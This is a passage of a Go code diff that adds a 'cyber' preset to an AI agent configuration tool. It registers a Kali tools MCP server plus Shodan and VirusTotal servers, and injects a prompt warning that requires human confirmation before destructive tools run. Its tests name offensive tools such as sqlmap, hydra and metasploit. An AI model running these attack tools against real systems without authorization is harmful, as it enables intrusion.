+	comment += " */\n"
+	return comment
+}
+
+// destructiveWarningBlock returns the markdown block injected into agent system prompts
+// when the cyber preset is selected.
+func destructiveWarningBlock(tools []string) string {
+	block := "<!-- gentle-ai-cyber:destructive-warning -->\n\n"
+	block += "## Destructive Tool Warning\n\n"
+	block += "Before executing any tool marked **DESTRUCTIVE**, confirm with the user. "
+	block += "Never auto-invoke these tools without explicit human approval.\n\n"
+	block += "The following kali-mcp tools require manual confirmation:\n\n"
+	for _, tool := range tools {
+		block += fmt.Sprintf("- `%s`\n", tool)
+	}
+	block += "\n<!-- /gentle-ai-cyber:destructive-warning -->\n"
+	return block
+}
+
+// KaliMCPOverlayJSON returns the overlay JSON for kali-mcp with the appropriate
+// strategy for the given agent. For StrategySeparateMCPFiles, the JSON is prefixed
+// with a destructive tool warning comment.
+func KaliMCPOverlayJSON(agent model.AgentID) ([]byte, error) {
+	manifest, err := loadKaliManifest()
+	if err != nil {
+		return nil, err
+	}
+
+	// Build the base server config.
+	serverJSON := map[string]any{
+		"command": "kali-server-mcp",
+		"args":    []string{},
+	}
+
+	// For StrategySeparateMCPFiles, prefix with warning comment.
+	adapter, err := newAgentAdapter(agent)
+	if err != nil {
+		return nil, err
+	}
+
+	if adapter != nil && adapter.MCPStrategy() == model.StrategySeparateMCPFiles {
+		warning := kaliWarningComment(manifest.DestructiveTools)
+		jsonBytes, err := json.MarshalIndent(serverJSON, "", "  ")
+		if err != nil {
+			return nil, fmt.Errorf("marshal kali-mcp server JSON: %w", err)
+		}
+		commented := warning + string(jsonBytes) + "\n"
+		return []byte(commented), nil
+	}
+
+	// For other strategies, return standard overlay.
+	overlay := map[string]any{
+		"mcpServers": map[string]any{
+			"kali-mcp": serverJSON,
+		},
+	}
+
+	jsonBytes, err := json.MarshalIndent(overlay, "", "  ")
+	if err != nil {
+		return nil, fmt.Errorf("marshal kali-mcp overlay JSON: %w", err)
+	}
+
+	return append(jsonBytes, '\n'), nil
+}
+
+// KaliMCPServerJSON returns the raw server config JSON for kali-mcp (without mcpServers wrapper).
+func KaliMCPServerJSON() ([]byte, error) {
+	manifest, err := loadKaliManifest()
+	if err != nil {
+		return nil, err
+	}
+
+	serverJSON := map[string]any{
+		"command": "kali-server-mcp",
+		"args":    []string{},
+	}
+
+	jsonBytes, err := json.MarshalIndent(serverJSON, "", "  ")
+	if err != nil {
+		return nil, fmt.Errorf("marshal kali-mcp server JSON: %w", err)
+	}
+
+	// For StrategySeparateMCPFiles, prefix with warning comment.
+	warning := kaliWarningComment(manifest.DestructiveTools)
+	return []byte(warning + string(jsonBytes) + "\n"), nil
+}
+
+// KaliDestructiveWarningBlock returns the markdown warning block for system prompt injection.
+func KaliDestructiveWarningBlock() (string, error) {
+	manifest, err := loadKaliManifest()
+	if err != nil {
+		return "", err
+	}
+	return destructiveWarningBlock(manifest.DestructiveTools), nil
+}
+
+// newAgentAdapter creates a minimal adapter for MCP strategy detection.
+// Returns nil if the agent is not supported.
+func newAgentAdapter(agent model.AgentID) (*minimalAdapter, error) {
+	// MCP strategy map based on known agent configurations.
+	strategies := map[model.AgentID]model.MCPStrategy{
+		model.AgentClaudeCode:    model.StrategySeparateMCPFiles,
+		model.AgentOpenCode:      model.StrategyMergeIntoSettings,
+		model.AgentKilocode:      model.StrategyMergeIntoSettings,
+		model.AgentGeminiCLI:     model.StrategyMergeIntoSettings,
+		model.AgentCursor:        model.StrategyMCPConfigFile,
+		model.AgentVSCodeCopilot: model.StrategyMCPConfigFile,
+		model.AgentCodex:         model.StrategyTOMLFile,
+		model.AgentAntigravity:   model.StrategyMCPConfigFile,
+		model.AgentWindsurf:      model.StrategyMergeIntoSettings,
+		model.AgentKimi:          model.StrategyMergeIntoSettings,
+		model.AgentQwenCode:      model.StrategyMergeIntoSettings,
+		model.AgentKiroIDE:       model.StrategyMergeIntoSettings,
+		model.AgentOpenClaw:      model.StrategyMergeIntoSettings,
+		model.AgentPi:            model.StrategyMergeIntoSettings,
+	}
+
+	s, ok := strategies[agent]
+	if !ok {
+		return nil, fmt.Errorf("unknown agent %q", agent)
+	}
+
+	return &minimalAdapter{strategy: s}, nil
+}
+
+type minimalAdapter struct {
+	strategy model.MCPStrategy
+}
+
+func (m *minimalAdapter) MCPStrategy() model.MCPStrategy {
+	return m.strategy
+}
+
+// InjectKaliMCP injects kali-mcp configuration for the given agent.
+// Returns the injection result with changed status and affected files.
+func InjectKaliMCP(homeDir string, adapter interface {
+	MCPStrategy() model.MCPStrategy
+	MCPConfigPath(homeDir, name string) string
+	SettingsPath(homeDir string) string
+}) (InjectionResult, error) {
+	manifest, err := loadKaliManifest()
+	if err != nil {
+		return InjectionResult{}, err
+	}
+
+	serverJSON := map[string]any{
+		"command": "kali-server-mcp",
+		"args":    []string{},
+	}
+
+	switch adapter.MCPStrategy() {
+	case model.StrategySeparateMCPFiles:
+		return injectKaliSeparateFile(homeDir, adapter, serverJSON, manifest.DestructiveTools)
+	case model.StrategyMergeIntoSettings:
+		return injectKaliMergeIntoSettings(homeDir, adapter, serverJSON)
+	default:
+		return InjectionResult{}, nil
+	}
+}
+
+func injectKaliSeparateFile(homeDir string, adapter interface {
+	MCPConfigPath(homeDir, name string) string
+}, serverJSON map[string]any, destructiveTools []string) (InjectionResult, error) {
+	path := adapter.MCPConfigPath(homeDir, "kali-mcp")
+
+	jsonBytes, err := json.MarshalIndent(serverJSON, "", "  ")
+	if err != nil {
+		return InjectionResult{}, fmt.Errorf("marshal kali-mcp server JSON: %w", err)
+	}
+
+	warning := kaliWarningComment(destructiveTools)
+	content := []byte(warning + string(jsonBytes) + "\n")
+
+	writeResult, err := filemerge.WriteFileAtomic(path, content, 0o644)
+	if err != nil {
+		return InjectionResult{}, err
+	}
+
+	return InjectionResult{Changed: writeResult.Changed, Files: []string{path}}, nil
+}
+
+func injectKaliMergeIntoSettings(homeDir string, adapter interface {
+	SettingsPath(homeDir string) string
+}, serverJSON map[string]any) (InjectionResult, error) {
+	settingsPath := adapter.SettingsPath(homeDir)
+	if settingsPath == "" {
+		return InjectionResult{}, nil
+	}
+
+	overlay := map[string]any{
+		"mcpServers": map[string]any{
+			"kali-mcp": serverJSON,
+		},
+	}
+
+	overlayBytes, err := json.MarshalIndent(overlay, "", "  ")
+	if err != nil {
+		return InjectionResult{}, fmt.Errorf("marshal kali-mcp overlay: %w", err)
+	}
+	overlayBytes = append(overlayBytes, '\n')
+
+	writeResult, err := mergeJSONFile(settingsPath, overlayBytes)
+	if err != nil {
+		return InjectionResult{}, err
+	}
+
+	return InjectionResult{Changed: writeResult.Changed, Files: []string{settingsPath}}, nil
+}
+
+// InjectShodanMCP injects shodan-mcp configuration for the given agent.
+func InjectShodanMCP(homeDir string, adapter interface {
+	MCPStrategy() model.MCPStrategy
+	MCPConfigPath(homeDir, name string) string
+	SettingsPath(homeDir string) string
+}) (InjectionResult, error) {
+	serverJSON := map[string]any{
+		"command": "npx",
+		"args":    []string{"-y", "@modelcontextprotocol/server-shodan"},
+	}
+
+	switch adapter.MCPStrategy() {
+	case model.StrategySeparateMCPFiles:
+		path := adapter.MCPConfigPath(homeDir, "shodan-mcp")
+		jsonBytes, err := json.MarshalIndent(serverJSON, "", "  ")
+		if err != nil {
+			return InjectionResult{}, err
+		}
+		writeResult, err := filemerge.WriteFileAtomic(path, append(jsonBytes, '\n'), 0o644)
+		if err != nil {
+			return InjectionResult{}, err
+		}
+		return InjectionResult{Changed: writeResult.Changed, Files: []string{path}}, nil
+	case model.StrategyMergeIntoSettings:
+		settingsPath := adapter.SettingsPath(homeDir)
+		if settingsPath == "" {
+			return InjectionResult{}, nil
+		}
+		overlay := map[string]any{
+			"mcpServers": map[string]any{
+				"shodan-mcp": serverJSON,
+			},
+		}
+		overlayBytes, err := json.MarshalIndent(overlay, "", "  ")
+		if err != nil {
+			return InjectionResult{}, err
+		}
+		writeResult, err := mergeJSONFile(settingsPath, append(overlayBytes, '\n'))
+		if err != nil {
+			return InjectionResult{}, err
+		}
+		return InjectionResult{Changed: writeResult.Changed, Files: []string{settingsPath}}, nil
+	default:
+		return InjectionResult{}, nil
+	}
+}
+
+// InjectVirusTotalMCP injects virustotal-mcp configuration for the given agent.
+func InjectVirusTotalMCP(homeDir string, adapter interface {
+	MCPStrategy() model.MCPStrategy
+	MCPConfigPath(homeDir, name string) string
+	SettingsPath(homeDir string) string
+}) (InjectionResult, error) {
+	serverJSON := map[string]any{
+		"command": "npx",
+		"args":    []string{"-y", "@modelcontextprotocol/server-virustotal"},
+	}
+
+	switch adapter.MCPStrategy() {
+	case model.StrategySeparateMCPFiles:
+		path := adapter.MCPConfigPath(homeDir, "virustotal-mcp")
+		jsonBytes, err := json.MarshalIndent(serverJSON, "", "  ")
+		if err != nil {
+			return InjectionResult{}, err
+		}
+		writeResult, err := filemerge.WriteFileAtomic(path, append(jsonBytes, '\n'), 0o644)
+		if err != nil {
+			return InjectionResult{}, err
+		}
+		return InjectionResult{Changed: writeResult.Changed, Files: []string{path}}, nil
+	case model.StrategyMergeIntoSettings:
+		settingsPath := adapter.SettingsPath(homeDir)
+		if settingsPath == "" {
+			return InjectionResult{}, nil
+		}
+		overlay := map[string]any{
+			"mcpServers": map[string]any{
+				"virustotal-mcp": serverJSON,
+			},
+		}
+		overlayBytes, err := json.MarshalIndent(overlay, "", "  ")
+		if err != nil {
+			return InjectionResult{}, err
+		}
+		writeResult, err := mergeJSONFile(settingsPath, append(overlayBytes, '\n'))
+		if err != nil {
+			return InjectionResult{}, err
+		}
+		return InjectionResult{Changed: writeResult.Changed, Files: []string{settingsPath}}, nil
+	default:
+		return InjectionResult{}, nil
+	}
+}
+
+// GentlemanSOCContent returns the gentleman-soc agent definition content from embedded assets.
+func GentlemanSOCContent() (string, error) {
+	content, err := assets.FS.ReadFile("agents/gentleman-soc.md")
+	if err != nil {
+		return "", fmt.Errorf("read gentleman-soc agent definition: %w", err)
+	}
+	return string(content), nil
+}
+
+// InjectGentlemanSOC injects the gentleman-soc agent definition into the system prompt.
+// Only applies to agents using StrategyMarkdownSections (e.g., Claude Code).
+func InjectGentlemanSOC(homeDir string, adapter interface {
+	SystemPromptFile(homeDir string) string
+}) (InjectionResult, error) {
+	content, err := GentlemanSOCContent()
+	if err != nil {
+		return InjectionResult{}, err
+	}
+
+	promptPath := adapter.SystemPromptFile(homeDir)
+	existing, err := osReadFileForString(promptPath)
+	if err != nil {
+		return InjectionResult{}, err
+	}
+
+	updated := filemerge.InjectMarkdownSection(existing, "gentleman-soc", content)
+	writeResult, err := filemerge.WriteFileAtomic(promptPath, []byte(updated), 0o644)
+	if err != nil {
+		return InjectionResult{}, err
+	}
+
+	return InjectionResult{Changed: writeResult.Changed, Files: []string{promptPath}}, nil
+}
+
+// InjectDestructiveWarning injects the destructive tool warning into the system prompt.
+// Only applies to agents using StrategyMarkdownSections (e.g., Claude Code).
+func InjectDestructiveWarning(homeDir string, adapter interface {
+	SystemPromptFile(homeDir string) string
+}) (InjectionResult, error) {
+	warning, err := KaliDestructiveWarningBlock()
+	if err != nil {
+		return InjectionResult{}, err
+	}
+
+	promptPath := adapter.SystemPromptFile(homeDir)
+	existing, err := osReadFileForString(promptPath)
+	if err != nil {
+		return InjectionResult{}, err
+	}
+
+	updated := filemerge.InjectMarkdownSection(existing, "gentle-ai-cyber:destructive-warning", warning)
+	writeResult, err := filemerge.WriteFileAtomic(promptPath, []byte(updated), 0o644)
+	if err != nil {
+		return InjectionResult{}, err
+	}
+
+	return InjectionResult{Changed: writeResult.Changed, Files: []string{promptPath}}, nil
+}
+
+func osReadFileForString(path string) (string, error) {
+	content, err := os.ReadFile(path)
+	if err != nil {
+		if os.IsNotExist(err) {
+			return "", nil
+		}
+		return "", fmt.Errorf("read file %q: %w", path, err)
+	}
+	return string(content), nil
+}

--- a/internal/components/mcp/kali_mcp_test.go
+++ b/internal/components/mcp/kali_mcp_test.go
@@ -1,0 +1,299 @@
+package mcp
+
+import (
+	"encoding/json"
+	"strings"
+	"testing"
+
+	"github.com/gentleman-programming/gentle-ai/internal/model"
+)
+
+// TestKaliMCPOverlayJSONHasWarningForSeparateFileAgents verifies that
+// KaliMCPOverlayJSON prefixes the JSON with a destructive tool warning
+// comment for agents using StrategySeparateMCPFiles.
+//
+// Spec: cyber-mcp — "Destructive tool warning in overlay JSON"
+func TestKaliMCPOverlayJSONHasWarningForSeparateFileAgents(t *testing.T) {
+	// Claude Code uses StrategySeparateMCPFiles.
+	jsonBytes, err := KaliMCPOverlayJSON(model.AgentClaudeCode)
+	if err != nil {
+		t.Fatalf("KaliMCPOverlayJSON(claude-code) error = %v", err)
+	}
+
+	content := string(jsonBytes)
+
+	// Must have the warning comment prefix.
+	if !strings.Contains(content, "/**_WARNING**/") {
+		t.Error("kali-mcp overlay for Claude Code must contain /**_WARNING**/ comment")
+	}
+
+	// Must list destructive tools in the warning.
+	destructiveTools := []string{
+		"nmap_scan",
+		"sqlmap_scan",
+		"metasploit_run",
+		"hydra_attack",
+	}
+	for _, tool := range destructiveTools {
+		if !strings.Contains(content, tool) {
+			t.Errorf("kali-mcp overlay warning must list tool %q", tool)
+		}
+	}
+
+	// The JSON portion after the comment must still be valid JSON.
+	jsonStart := strings.Index(content, "{")
+	if jsonStart == -1 {
+		t.Fatal("kali-mcp overlay must contain valid JSON after warning comment")
+	}
+	jsonPart := content[jsonStart:]
+	var parsed map[string]any
+	if err := json.Unmarshal([]byte(jsonPart), &parsed); err != nil {
+		t.Fatalf("JSON portion after warning must be valid JSON: %v", err)
+	}
+
+	// Must have command field.
+	if parsed["command"] != "kali-server-mcp" {
+		t.Errorf("kali-mcp overlay command = %v, want kali-server-mcp", parsed["command"])
+	}
+}
+
+// TestKaliMCPOverlayJSONNoWarningForMergeAgents verifies that agents using
+// StrategyMergeIntoSettings do NOT get the warning comment prefix (the
+// warning goes in the system prompt instead).
+func TestKaliMCPOverlayJSONNoWarningForMergeAgents(t *testing.T) {
+	// OpenCode uses StrategyMergeIntoSettings.
+	jsonBytes, err := KaliMCPOverlayJSON(model.AgentOpenCode)
+	if err != nil {
+		t.Fatalf("KaliMCPOverlayJSON(opencode) error = %v", err)
+	}
+
+	content := string(jsonBytes)
+
+	// Must NOT have the warning comment prefix for merge-strategy agents.
+	if strings.Contains(content, "/**_WARNING**/") {
+		t.Error("kali-mcp overlay for OpenCode must NOT contain warning comment (warning goes in system prompt)")
+	}
+
+	// Must have mcpServers wrapper.
+	if !strings.Contains(content, `"mcpServers"`) {
+		t.Error("kali-mcp overlay for OpenCode must have mcpServers wrapper")
+	}
+
+	// Must be valid JSON.
+	var parsed map[string]any
+	if err := json.Unmarshal(jsonBytes, &parsed); err != nil {
+		t.Fatalf("kali-mcp overlay for OpenCode must be valid JSON: %v", err)
+	}
+}
+
+// TestKaliWarningCommentListsAllDestructiveTools verifies the warning
+// comment includes every tool from the manifest.
+func TestKaliWarningCommentListsAllDestructiveTools(t *testing.T) {
+	manifest, err := loadKaliManifest()
+	if err != nil {
+		t.Fatalf("loadKaliManifest() error = %v", err)
+	}
+
+	comment := kaliWarningComment(manifest.DestructiveTools)
+
+	for _, tool := range manifest.DestructiveTools {
+		if !strings.Contains(comment, tool) {
+			t.Errorf("warning comment must list tool %q", tool)
+		}
+	}
+}
+
+// TestDestructiveWarningBlockHasCorrectFormat verifies the markdown block
+// injected into system prompts has the correct delimiters and content.
+//
+// Spec: cyber-permissions — "Soft gate via agent prompt"
+func TestDestructiveWarningBlockHasCorrectFormat(t *testing.T) {
+	block, err := KaliDestructiveWarningBlock()
+	if err != nil {
+		t.Fatalf("KaliDestructiveWarningBlock() error = %v", err)
+	}
+
+	// Must have the opening marker.
+	if !strings.Contains(block, "<!-- gentle-ai-cyber:destructive-warning -->") {
+		t.Error("warning block must have opening <!-- gentle-ai-cyber:destructive-warning --> marker")
+	}
+
+	// Must have the closing marker.
+	if !strings.Contains(block, "<!-- /gentle-ai-cyber:destructive-warning -->") {
+		t.Error("warning block must have closing <!-- /gentle-ai-cyber:destructive-warning --> marker")
+	}
+
+	// Must have the heading.
+	if !strings.Contains(block, "## Destructive Tool Warning") {
+		t.Error("warning block must have `## Destructive Tool Warning` heading")
+	}
+
+	// Must mention confirmation.
+	if !strings.Contains(block, "confirm") {
+		t.Error("warning block must mention user confirmation")
+	}
+
+	// Must list destructive tools as code-formatted items.
+	manifest, err := loadKaliManifest()
+	if err != nil {
+		t.Fatalf("loadKaliManifest() error = %v", err)
+	}
+	for _, tool := range manifest.DestructiveTools {
+		if !strings.Contains(block, "`"+tool+"`") {
+			t.Errorf("warning block must list tool %q as code-formatted item", tool)
+		}
+	}
+}
+
+// TestKaliMCPServerJSONIncludesWarning verifies that KaliMCPServerJSON
+// returns the server config prefixed with the warning comment.
+func TestKaliMCPServerJSONIncludesWarning(t *testing.T) {
+	jsonBytes, err := KaliMCPServerJSON()
+	if err != nil {
+		t.Fatalf("KaliMCPServerJSON() error = %v", err)
+	}
+
+	content := string(jsonBytes)
+
+	if !strings.Contains(content, "/**_WARNING**/") {
+		t.Error("KaliMCPServerJSON must include warning comment")
+	}
+
+	// Must contain the server command.
+	if !strings.Contains(content, "kali-server-mcp") {
+		t.Error("KaliMCPServerJSON must contain kali-server-mcp command")
+	}
+}
+
+// TestLoadKaliManifestParsesAllFields verifies the manifest is parsed
+// correctly with all required fields.
+func TestLoadKaliManifestParsesAllFields(t *testing.T) {
+	manifest, err := loadKaliManifest()
+	if err != nil {
+		t.Fatalf("loadKaliManifest() error = %v", err)
+	}
+
+	if manifest.Name != "kali-mcp" {
+		t.Errorf("manifest name = %q, want %q", manifest.Name, "kali-mcp")
+	}
+
+	if manifest.PermissionTier != "destructive" {
+		t.Errorf("manifest permission_tier = %q, want %q", manifest.PermissionTier, "destructive")
+	}
+
+	if len(manifest.DestructiveTools) == 0 {
+		t.Error("manifest destructive_tools must be non-empty")
+	}
+
+	if !manifest.ConfirmationRequired {
+		t.Error("manifest confirmation_required must be true")
+	}
+
+	// Verify all 10 destructive tools are present.
+	wantTools := []string{
+		"nmap_scan",
+		"sqlmap_scan",
+		"hydra_attack",
+		"metasploit_run",
+		"nikto_scan",
+		"dirb_scan",
+		"gobuster_scan",
+		"wpscan_analyze",
+		"john_crack",
+		"enum4linux_scan",
+	}
+
+	for _, want := range wantTools {
+		found := false
+		for _, got := range manifest.DestructiveTools {
+			if got == want {
+				found = true
+				break
+			}
+		}
+		if !found {
+			t.Errorf("manifest missing destructive tool %q", want)
+		}
+	}
+}
+
+// TestGentlemanSOCContentIsReadable verifies the gentleman-soc agent
+// definition can be loaded from embedded assets.
+func TestGentlemanSOCContentIsReadable(t *testing.T) {
+	content, err := GentlemanSOCContent()
+	if err != nil {
+		t.Fatalf("GentlemanSOCContent() error = %v", err)
+	}
+
+	if len(content) == 0 {
+		t.Fatal("GentlemanSOCContent() returned empty content")
+	}
+
+	// Must reference PICERL phases (uses "Preparation", "Identification", "Containment", "Recovery").
+	picerlPhases := []string{"PICERL", "Preparation", "Identification", "Containment", "Recovery"}
+	for _, phase := range picerlPhases {
+		if !strings.Contains(content, phase) {
+			t.Errorf("gentleman-soc.md must reference PICERL phase %q", phase)
+		}
+	}
+
+	// Must reference cyber skills.
+	cyberSkillRefs := []string{
+		"malware-triage",
+		"specialized-file-analyzer",
+		"detection-engineer",
+		"malware-report-writer",
+	}
+	for _, ref := range cyberSkillRefs {
+		if !strings.Contains(content, ref) {
+			t.Errorf("gentleman-soc.md must reference skill %q", ref)
+		}
+	}
+}
+
+// TestNewAgentAdapterReturnsStrategyForAllKnownAgents verifies that
+// newAgentAdapter returns a valid strategy for every known agent.
+func TestNewAgentAdapterReturnsStrategyForAllKnownAgents(t *testing.T) {
+	knownAgents := []model.AgentID{
+		model.AgentClaudeCode,
+		model.AgentOpenCode,
+		model.AgentKilocode,
+		model.AgentGeminiCLI,
+		model.AgentCursor,
+		model.AgentVSCodeCopilot,
+		model.AgentCodex,
+		model.AgentAntigravity,
+		model.AgentWindsurf,
+		model.AgentKimi,
+		model.AgentQwenCode,
+		model.AgentKiroIDE,
+		model.AgentOpenClaw,
+		model.AgentPi,
+	}
+
+	for _, agent := range knownAgents {
+		t.Run(string(agent), func(t *testing.T) {
+			adapter, err := newAgentAdapter(agent)
+			if err != nil {
+				t.Fatalf("newAgentAdapter(%q) error = %v", agent, err)
+			}
+			if adapter == nil {
+				t.Fatal("newAgentAdapter returned nil adapter for known agent")
+			}
+			// Strategy must be a valid value.
+			strategy := adapter.MCPStrategy()
+			if strategy < model.StrategySeparateMCPFiles || strategy > model.StrategyTOMLFile {
+				t.Errorf("invalid MCP strategy %d for agent %q", strategy, agent)
+			}
+		})
+	}
+}
+
+// TestNewAgentAdapterErrorsForUnknownAgent verifies that an unknown agent
+// returns an error.
+func TestNewAgentAdapterErrorsForUnknownAgent(t *testing.T) {
+	_, err := newAgentAdapter(model.AgentID("unknown-agent"))
+	if err == nil {
+		t.Fatal("newAgentAdapter(unknown-agent) should return error, got nil")
+	}
+}

--- a/internal/components/skills/presets.go
+++ b/internal/components/skills/presets.go
@@ -31,11 +31,26 @@ var foundationSkills = []model.SkillID{
 	model.SkillWorkUnitCommits,
 }
 
+// cyberSkills are the v1 cybersecurity skills for the cyber preset.
+var cyberSkills = []model.SkillID{
+	model.SkillPentestOrchestrator,
+	model.SkillAIPentestingValidation,
+	model.SkillExploitChainPatterns,
+	model.SkillWAFDetectionBypass,
+	model.SkillDetectionEngineer,
+	model.SkillSecurityPythonScripts,
+	model.SkillMalwareTriage,
+	model.SkillSpecializedFileAnalyzer,
+	model.SkillMalwareDynamicAnalysis,
+	model.SkillMalwareReportWriter,
+}
+
 // SkillsForPreset returns which skills should be installed for a given preset.
 //
 //   - "minimal" / PresetMinimal:       SDD skills only
 //   - "ecosystem-only" / PresetEcosystemOnly: SDD + common framework skills
 //   - "full-gentleman" / PresetFullGentleman: all available skills
+//   - "cyber" / PresetCyber:           all MVP skills + cybersecurity skills
 //   - "custom" / PresetCustom:         empty (caller should provide explicit list)
 func SkillsForPreset(preset model.PresetID) []model.SkillID {
 	switch preset {
@@ -47,6 +62,12 @@ func SkillsForPreset(preset model.PresetID) []model.SkillID {
 		all := make([]model.SkillID, 0, len(sddSkills)+len(foundationSkills))
 		all = append(all, sddSkills...)
 		all = append(all, foundationSkills...)
+		return all
+	case model.PresetCyber:
+		all := make([]model.SkillID, 0, len(sddSkills)+len(foundationSkills)+len(cyberSkills))
+		all = append(all, sddSkills...)
+		all = append(all, foundationSkills...)
+		all = append(all, cyberSkills...)
 		return all
 	case model.PresetCustom:
 		return nil
@@ -61,9 +82,10 @@ func SkillsForPreset(preset model.PresetID) []model.SkillID {
 
 // AllSkillIDs returns every known skill ID.
 func AllSkillIDs() []model.SkillID {
-	all := make([]model.SkillID, 0, len(sddSkills)+len(foundationSkills))
+	all := make([]model.SkillID, 0, len(sddSkills)+len(foundationSkills)+len(cyberSkills))
 	all = append(all, sddSkills...)
 	all = append(all, foundationSkills...)
+	all = append(all, cyberSkills...)
 	return all
 }
 

--- a/internal/components/skills/presets_cyber_test.go
+++ b/internal/components/skills/presets_cyber_test.go
@@ -1,0 +1,167 @@
+package skills
+
+import (
+	"sort"
+	"testing"
+
+	"github.com/gentleman-programming/gentle-ai/internal/model"
+)
+
+// TestPresetCyberResolvesToMVPPPlusCyberSkills verifies that
+// SkillsForPreset(PresetCyber) returns all MVP skills plus all cyber skills.
+//
+// Spec: cyber-testing — "Cyber preset includes expected components"
+func TestPresetCyberResolvesToMVPPPlusCyberSkills(t *testing.T) {
+	skills := SkillsForPreset(model.PresetCyber)
+
+	// Count MVP + cyber skills.
+	mvpCount := len(sddSkills) + len(foundationSkills)
+	cyberCount := len(cyberSkills)
+	wantCount := mvpCount + cyberCount
+
+	if got := len(skills); got != wantCount {
+		t.Fatalf("SkillsForPreset(PresetCyber) returned %d skills, want %d (%d MVP + %d cyber)",
+			got, wantCount, mvpCount, cyberCount)
+	}
+
+	// Verify all cyber skills are present.
+	skillSet := make(map[model.SkillID]bool)
+	for _, s := range skills {
+		skillSet[s] = true
+	}
+
+	for _, cyberSkill := range cyberSkills {
+		if !skillSet[cyberSkill] {
+			t.Errorf("cyber skill %q missing from PresetCyber result", cyberSkill)
+		}
+	}
+
+	// Verify all MVP skills are present.
+	for _, sddSkill := range sddSkills {
+		if !skillSet[sddSkill] {
+			t.Errorf("SDD skill %q missing from PresetCyber result", sddSkill)
+		}
+	}
+	for _, foundSkill := range foundationSkills {
+		if !skillSet[foundSkill] {
+			t.Errorf("foundation skill %q missing from PresetCyber result", foundSkill)
+		}
+	}
+}
+
+// TestPresetCyberIsDeterministic verifies that calling SkillsForPreset
+// twice returns identical results.
+//
+// Spec: cyber-testing — "Cyber preset component count is deterministic"
+func TestPresetCyberIsDeterministic(t *testing.T) {
+	first := SkillsForPreset(model.PresetCyber)
+	second := SkillsForPreset(model.PresetCyber)
+
+	if len(first) != len(second) {
+		t.Fatalf("length mismatch: first=%d, second=%d", len(first), len(second))
+	}
+
+	// Sort both slices for comparison.
+	sort.Slice(first, func(i, j int) bool { return first[i] < first[j] })
+	sort.Slice(second, func(i, j int) bool { return second[i] < second[j] })
+
+	for i := range first {
+		if first[i] != second[i] {
+			t.Errorf("result mismatch at index %d: first=%q, second=%q", i, first[i], second[i])
+		}
+	}
+}
+
+// TestNonCyberPresetsUnchanged verifies that existing presets do not
+// include cyber skills.
+//
+// Spec: cyber-testing — "Non-cyber presets are unchanged"
+func TestNonCyberPresetsUnchanged(t *testing.T) {
+	nonCyberPresets := []model.PresetID{
+		model.PresetFullGentleman,
+		model.PresetEcosystemOnly,
+		model.PresetMinimal,
+	}
+
+	for _, preset := range nonCyberPresets {
+		t.Run(string(preset), func(t *testing.T) {
+			skills := SkillsForPreset(preset)
+
+			for _, s := range skills {
+				for _, cyberSkill := range cyberSkills {
+					if s == cyberSkill {
+						t.Errorf("non-cyber preset %q should not include cyber skill %q", preset, cyberSkill)
+					}
+				}
+			}
+		})
+	}
+}
+
+// TestAllSkillIDsIncludesCyberSkills verifies that AllSkillIDs() returns
+// all cyber skill IDs.
+func TestAllSkillIDsIncludesCyberSkills(t *testing.T) {
+	allIDs := AllSkillIDs()
+
+	idSet := make(map[model.SkillID]bool)
+	for _, id := range allIDs {
+		idSet[id] = true
+	}
+
+	for _, cyberSkill := range cyberSkills {
+		if !idSet[cyberSkill] {
+			t.Errorf("cyber skill %q missing from AllSkillIDs()", cyberSkill)
+		}
+	}
+}
+
+// TestCyberSkillsSliceHas10Entries verifies the cyberSkills slice in
+// presets.go has exactly 10 entries.
+func TestCyberSkillsSliceHas10Entries(t *testing.T) {
+	if got := len(cyberSkills); got != 10 {
+		t.Fatalf("cyberSkills slice has %d entries, want 10", got)
+	}
+}
+
+// TestCyberSkillsInPresetsAreUnique verifies no duplicate skill IDs in
+// the presets.go cyberSkills slice.
+func TestCyberSkillsInPresetsAreUnique(t *testing.T) {
+	seen := make(map[model.SkillID]bool)
+	for _, id := range cyberSkills {
+		if seen[id] {
+			t.Errorf("duplicate cyber skill ID %q in presets.go cyberSkills", id)
+		}
+		seen[id] = true
+	}
+}
+
+// TestNoSkillIDCollisionsBetweenPresetsAndCatalog verifies that the
+// cyberSkills in presets.go match the cyberSkills in catalog.go.
+func TestNoSkillIDCollisionsBetweenPresetsAndCatalog(t *testing.T) {
+	// Build set from presets.go cyberSkills.
+	presetSet := make(map[model.SkillID]bool)
+	for _, id := range cyberSkills {
+		presetSet[id] = true
+	}
+
+	// Verify each catalog cyber skill is in presets.
+	// We import catalog indirectly by checking the known cyber skill IDs.
+	catalogCyberSkills := []model.SkillID{
+		model.SkillPentestOrchestrator,
+		model.SkillAIPentestingValidation,
+		model.SkillExploitChainPatterns,
+		model.SkillWAFDetectionBypass,
+		model.SkillDetectionEngineer,
+		model.SkillSecurityPythonScripts,
+		model.SkillMalwareTriage,
+		model.SkillSpecializedFileAnalyzer,
+		model.SkillMalwareDynamicAnalysis,
+		model.SkillMalwareReportWriter,
+	}
+
+	for _, id := range catalogCyberSkills {
+		if !presetSet[id] {
+			t.Errorf("catalog cyber skill %q missing from presets.go cyberSkills", id)
+		}
+	}
+}

--- a/internal/components/skills/presets_test.go
+++ b/internal/components/skills/presets_test.go
@@ -58,8 +58,39 @@ func TestSkillsForPresetFullIncludesAll(t *testing.T) {
 	skills := SkillsForPreset(model.PresetFullGentleman)
 	all := AllSkillIDs()
 
-	if len(skills) != len(all) {
-		t.Fatalf("full preset skills len = %d, all skills len = %d", len(skills), len(all))
+	// PresetFullGentleman does NOT include cyber skills; AllSkillIDs does.
+	// So we check that full preset skills are a subset of all skills.
+	skillSet := make(map[model.SkillID]struct{}, len(all))
+	for _, s := range all {
+		skillSet[s] = struct{}{}
+	}
+	for _, s := range skills {
+		if _, ok := skillSet[s]; !ok {
+			t.Fatalf("full preset skill %q not in AllSkillIDs", s)
+		}
+	}
+}
+
+func TestSkillsForPresetCyberIncludesAllMVPPlusCyber(t *testing.T) {
+	skills := SkillsForPreset(model.PresetCyber)
+	mvpCount := len(sddSkills) + len(foundationSkills)
+	cyberCount := len(cyberSkills)
+	expected := mvpCount + cyberCount
+
+	if len(skills) != expected {
+		t.Fatalf("cyber preset skills len = %d, expected %d (mvp=%d + cyber=%d)",
+			len(skills), expected, mvpCount, cyberCount)
+	}
+
+	// Verify cyber skills are present.
+	cyberSet := make(map[model.SkillID]struct{})
+	for _, s := range skills {
+		cyberSet[s] = struct{}{}
+	}
+	for _, cs := range cyberSkills {
+		if _, ok := cyberSet[cs]; !ok {
+			t.Fatalf("cyber preset missing cyber skill %q", cs)
+		}
 	}
 }
 

--- a/internal/model/types.go
+++ b/internal/model/types.go
